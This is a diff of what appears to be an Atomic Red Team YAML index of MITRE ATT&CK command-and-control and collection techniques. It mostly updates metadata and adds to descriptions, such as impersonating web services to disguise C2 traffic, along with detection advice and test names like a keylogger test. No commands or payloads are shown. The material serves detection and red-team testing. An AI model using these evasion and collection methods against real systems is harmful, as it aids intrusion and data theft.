       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests:
     - name: Testing usage of uncommonly used port
@@ -42340,7 +42819,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -42365,7 +42843,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -42402,8 +42880,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -42457,7 +42933,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -42529,33 +43004,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -42563,23 +43017,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -42626,7 +43118,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -42686,7 +43177,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -42718,7 +43208,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -42744,8 +43234,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -42812,7 +43300,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests:
     - name: Malicious User Agents - Nix
@@ -42930,7 +43417,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests:
     - name: rsync remote file copy (push)
@@ -43291,7 +43777,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -43315,7 +43800,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -43338,8 +43823,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -43364,7 +43847,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -43384,8 +43867,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -43439,7 +43920,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests:
     - name: Connection Proxy
@@ -43542,7 +44022,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -43568,8 +44048,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -43623,7 +44101,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -43699,7 +44176,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests:
     - name: Data Compressed - nix - zip
@@ -43942,7 +44418,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests:
     - name: Screencapture
@@ -44076,7 +44551,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -44155,7 +44629,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: MacOS Swift Keylogger
@@ -44229,7 +44702,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -44244,30 +44717,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -44276,13 +44729,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -44296,20 +44753,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -44352,7 +44826,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests:
     - name: using Quicktime Player
@@ -44410,7 +44883,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -44430,22 +44903,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -44462,11 +44937,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -44482,37 +44956,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -44524,75 +44989,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests:
     - name: Stage data from Discovery.sh
@@ -44655,7 +45138,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -44679,13 +45162,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -44706,6 +45187,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -44729,8 +45211,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -44755,7 +45239,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -44822,7 +45305,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests:
     - name: Execute commands from clipboard
@@ -44837,7 +45319,7 @@ collection:
         name: bash
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
